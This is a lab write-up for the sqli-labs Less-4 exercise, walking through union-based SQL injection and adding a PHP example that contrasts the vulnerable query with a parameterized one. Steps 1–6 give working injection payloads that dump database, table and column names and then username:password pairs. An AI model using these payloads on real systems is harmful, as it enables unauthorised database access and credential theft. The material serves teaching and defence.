Sqli-labs Less-4 Union injection

After opening the page, it prompts "Please input parameter id, and assign it a numeric value."

1. Find the injection point

Input ?id=1 returns a normal result; input ?id=1" produces an error, indicating the presence of a SQL injection vulnerability.

Viewing the back-end source shows the following query. The difference from Less-3 (error-based GET injection, single-quote variant) is that the payload must now close the value with ") (double quotation mark plus right parenthesis) rather than ') (single quotation mark plus right parenthesis).

$id=$_GET['id'];
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

2. Determine the number of columns in the queried table

Input ?id=1") order by 3 --+ returns a normal result;

Input ?id=1") order by 4 --+ returns an error, indicating that the table has 3 columns.

3. Extract the database name

?id=-1") union select 1,2,database() --+

4. Extract the table names

?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

5. Extract the column (field) names

?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

6. Extract the data values

?id=-1") union select 1,2,group_concat(username,0x3a,password) from users --+
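
Every step above works because the Less-4 query from step 1 pastes the id between (" and "). The following added example (not part of the original post or of sqli-labs) prints the query text Less-4 builds for the inputs from steps 1 and 2 next to a validated, parameterized lookup. The in-memory SQLite table, its rows, and the helper names less4_sql and find_user are assumptions made for illustration.

```php
<?php
// Added example, not sqli-labs code. Assumes the pdo_sqlite extension; an
// in-memory SQLite table with constructed rows stands in for the lab's MySQL.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$pdo->exec("INSERT INTO users VALUES (1, 'alice', 'constructed-1'), (2, 'bob', 'constructed-2')");

// Query text exactly as Less-4 builds it: the input lands between (" and ").
function less4_sql(string $id): string
{
    $id = '"' . $id . '"';
    return "SELECT * FROM users WHERE id=($id) LIMIT 0,1";
}

// Hardened lookup (hypothetical helper): the id is validated as a positive
// integer, then bound as a parameter, so it never becomes part of the SQL text.
function find_user(PDO $pdo, string $raw): ?array
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // not a plain integer: reject before touching the database
    }
    $stmt = $pdo->prepare('SELECT id, username FROM users WHERE id = :id LIMIT 1');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Inputs taken from steps 1 and 2 of the page, after URL decoding (+ is a space).
$inputs = ['1', '1"', '1") order by 4 -- '];
foreach ($inputs as $raw) {
    echo 'input:    ', $raw, PHP_EOL;
    echo 'Less-4:   ', less4_sql($raw), PHP_EOL;
    $row = find_user($pdo, $raw);
    echo 'hardened: ', $row === null ? 'rejected or no row' : json_encode($row), PHP_EOL, PHP_EOL;
}
```

In the Less-4 output for the third input, the order by clause sits outside the quoted value and the trailing ") LIMIT 0,1 is commented out; the hardened lookup rejects the same input before any SQL runs. The same pattern applies to the lab's MySQL back end through PDO's MySQL driver or mysqli prepared statements.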

Origin www.cnblogs.com/zhengna/p/12445784.html